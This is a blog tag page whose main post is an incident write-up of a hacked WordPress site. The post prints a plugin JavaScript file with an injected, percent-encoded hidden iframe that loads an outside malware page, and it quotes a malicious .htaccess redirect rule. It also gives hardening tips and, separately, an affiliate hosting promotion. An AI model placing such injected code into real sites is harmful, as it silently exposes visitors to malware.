Technical Tidbits™

Posts Tagged ‘wordpress’

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.

During my investigation, another interesting development that I was just told about, and that is another user of the web hosting service was also hacked in a similar method.

So now, I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites but, that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I poured over the SQL database dump for over 48 hours (not consecutively) and compared WP files like the WP_config.php and such and could not find anything except a strange base64-65 code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called, I Love Social Bookmarking and the file affected resided in:  wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named: ilsb.js

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The offending code is the one that writes the document and includes all the percent signs (%).

This code inserted an iframe in the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure you WP blog!

1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it the administrator priviladges.
2. Log out and log back in under the new name.
3. Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
4. Install the Bad Behavior Plug-in and configure it properly.

If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!

5. Make sure you config and get the API key for Akismet.
6. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
7. Make sure that all users – if you allow them to register – are configured to be subscribers only!
8. If you suspect foul play of any sort, search for a hidden user. To do that:

• Click on your Users section.
• Click on the link to the Administrators page.
• Right click on the page and choose: View Source.
• Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
• If you find one, you will have to delete this person out of your SQL database.

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here:  https://www.kb.cert.org/vuls/id/773545

And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!

Here at MICE, we don’t publicly advertise our security clients because it’s an open invitation to hackers.

However, I do need to tell you that I was recently hired to look over a self-hosted WordPress blog site that had been hacked.  I didn’t get to see the actual hacked message, but the client described it as a defacement of the main blog page saying, “You’ve been hacked.”

I am still trying to find out from the blog owner a few minor details to determine how it was actually done, but the .htaccess file had been modified giving the hacker permission to rewrite to all the files on the blog.

As soon as I find out the remaining information, I will post more details including screen shots of the website that the file redirected to.

I am blocking the actual redirect website with Xs in the line I found in question in the .htaccess file because I don’t want anyone going there, but if you see this code, delete it and re-upload the file.

RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]

The R stands for Redirect and the L means Last so it stops processing the rule after the condition is matched.

You can open the .htaccess file in a textpad or notepad document if you right mouse click and choose open with.

More later but this your heads up!

EXTENDED 1 MORE DAY BY REQUEST FOR CYBER MONDAY!

First, I’d like to share my Holiday greeting to you!

I hope you enjoyed my Holiday Greeting! That was done with JibJab in conjunction with Office Max, and I purchased it to share with you!

That being said, I have a special offer for this weekend only – today – Black Friday – November 27, 2009 through Sunday, November 29,2009 Monday, November 30, 2009 at 11:59 PM. Although this is a blog post and remains in the archives, this offer will expire at midnight Sunday Monday! I will not be able to honor requests made after that time.

I will perform the following service FREE as long you use the link that follows this blog post to sign up for LunarPages web hosting service.

TIIM* Disclosure: This is my affiliate link and I earn $65 if you sign up using this link.  This compensates me partially for what I will do for you.

Here are the services that I will provide under this offer FREE:

• Move an existing (see restrictions below) blog or website from your current web hosting account to your new LunarPages account. So if you’ve ever wanted to get on a secure and awesome web host now is your chance to make the move effortless!

• Move an existing hosted blog (see restrictions below) from Blogger, Wordpress.com, or others, to your own self-hosted blog that I’ll set-up for you on your new LunarPages account.  And no, you will not lose any of your blog posts that you posted before.  This includes getting you setup with all the necessary plug-ins and widgets that you need to not only protect you but enable you to connect to your social networks.

• Create a brand new WordPress blog for you on your new LunarPages web hosting account (see restrictions below).  And if you’re new to blogging, I will provide you support for up to 3 months to help you get started! This includes getting you setup with all the necessary plug-ins and widgets that you need to not only protect you but enable you to connect to your social networks.

Restrictions:

The website cannot have any scripts, auto-responders, or other software running like Joomla or Drupal. This move would require a lot of additional setup and potential complications that cannot be included in this offer.

If you are not sure what’s running on your website, use our Contact Page to contact me and give me the URL of your website in the message section and I’ll check it out and let you know if it’s doable. But the request must be made before midnight on Sunday, November 29, 2009 Monday, November 30, 2009!

If you are moving an entire blog from another host or a blogging site like Blogger, or WordPress, there cannot be more than 1,000 blog posts to move.

Your Part:

I will need access to your current host BEFORE you move the domain to the new name servers so I can get your website or blog downloaded for the move unless you already have a full back-up copy of the files yourself.

For blogs, I would like to do the back-up myself to insure I can transfer them properly.  (I’ve done this before and my method works.  See: our Creative page or read the testimonial below.)

If you are new to this or unsure of any of what I’m saying, use our contact page to have me take a look at your site or blog BEFORE you sign up with LunarPages.  I will honor any outstanding inquiries made during this offer. But you must at least put in an inquiry! There is not cost for me to look at your site!

And of course, this comes with our guarantee that you will be satisfied!

Start the New Year with a secure, reliable web host!

Remember, all you pay for is the web hosting service when you sign up – which is also ridiculously inexpensive – I’ll do the move free (applicable the restrictions listed above).

And you just never know what might happen! You may discover what Michelle from Accurate Process discovered when we moved their site and did a redesign! They were suddenly listed in the search engines, getting traffic, AND that was before we even finished our magic! It just might happen to you!

So, if you do nothing else this weekend, at least submit an inquiry on our contact page to preserve this offer!

If you’re ready to make the move, click the image below – it contains our affiliate link so we get credit.

Happy Holidays!

Debbie